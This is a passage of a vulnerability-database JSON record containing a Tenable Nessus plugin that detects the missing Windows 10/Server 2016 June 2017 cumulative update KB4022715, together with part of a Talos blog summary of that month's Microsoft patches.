attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n", "edition": 45, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022715.NASL", "href": "https://www.tenable.com/plugins/nessus/100760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100760);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0173\",\n \"CVE-2017-0193\",\n \"CVE-2017-0215\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8496\",\n \"CVE-2017-8497\",\n \"CVE-2017-8498\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98873,\n 98878,\n 98879,\n 98880,\n 98882,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022715 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-06';\nkbs = make_list('4022715');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(\n os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8499", "CVE-2017-8506", "CVE-2017-8507", "CVE-2017-8508", "CVE-2017-8509", "CVE-2017-8510", "CVE-2017-8511", "CVE-2017-8512", "CVE-2017-8513", "CVE-2017-8514", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8545", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8550", "CVE-2017-8551", "CVE-2017-8553", "CVE-2017-8555"], "description": "Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.<br /><br /><a name='more'></a><br /><h3 id=\"h.hv5a65yfsbxp\">Vulnerabilities Rated Critical</h3><h4 id=\"h.wfa2xeyn8j0o\">CVE-2017-0283</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.<br /><h4 id=\"h.pd0tltwr72p2\">CVE-2017-0291 / CVE-2017-0292</h4>These are remote code execution vulnerability in Microsoft Windows if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.<br /><h4 id=\"h.hv36855sqvlr\">CVE-2017-0294</h4>This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user to open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.<br /><h4 id=\"h.diewipjyn91o\">CVE-2017-8464</h4>This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.<br /><h4 id=\"h.wbb780pr8m8i\">CVE-2017-8496 / CVE-2017-8497</h4>These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.<br /><h4 id=\"h.1z06wiwr79tf\">CVE-2017-8499</h4>This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted websites.<br /><h4 id=\"h.i1b4odd02i18\">CVE-2017-8517</h4>This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker gaining taking full control of the affected system.<br /><h4 id=\"h.3l2zoggepikn\">CVE-2017-8520</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.hirfaaudj8y2\">CVE-2017-8522</h4>This is a remote code execution vulnerability in the way the Javascript engines render when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.xpxmg2ydkif2\">CVE-2017-8524</h4>This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.<br /><h4 id=\"h.j0uggxwjmgay\">CVE-2017-8527</h4>This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.<br /><h4 id=\"h.a2u2lz7ol3bu\">CVE-2017-8528</h4>This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.<br /><h4 id=\"h.bx2hk4byyp0\">CVE-2017-8543</h4>This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.pdkn0478ls9v\">CVE-2017-8548 / CVE-2017-8549</h4>These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. This can be exploited by having a user viewing a specially crafted website.<br /><h3 id=\"h.gpoya8yq4g7y\">Vulnerabilities Rated as Important</h3><h4 id=\"h.2bzwegrsdvuh\">CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219</h4>These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.<br /><h4 id=\"h.fbwxsdtpm92q\">CVE-2017-0193</h4>This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.<br /><h4 id=\"h.e4h7wyh0j9ao\">CVE-2017-0260 / CVE-2017-8506</h4>These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted office document and can result in the attacker gaining full control of the affected system.<br /><h4 id=\"h.d0s8jre8ln5i\">CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285</h4>This is an information disclosure vulnerability in Windows Uniscribe related to improper disclosure of the contents of its memory. This can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.bo1p344p5bt2\">CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289</h4>These are information disclosure vulnerabilities in the Windows GDI functionality that results in disclosure of the contents of memory. This can be exploited by a user opening a specially crafted document or convincing a user to access an untrusted webpage.<br /><h4 id=\"h.rc19ikpi9rkx\">CVE-2017-0295</h4>This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\\Users\\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.<br /><h4 id=\"h.ukhf4bu3xpr9\">CVE-2017-0296</h4>This is a privilege escalation vulnerability that impacts Windows 10. The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.9qf2te7i5b1f\">CVE-2017-0297</h4>This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege.<br /><h4 id=\"h.lotk64hjlvjg\">CVE-2017-0298</h4>This is a privilege escalation vulnerability in the Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to improperly authenticate a client. Exploitation occurs by an attacker that is logged into the system and executed a specially crafted application that would exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.<br /><h4 id=\"h.v8sfr1cbca79\">CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.<br /><h4 id=\"h.tyo4moefstll\">CVE-2017-8460</h4>This is an information disclosure vulnerability in 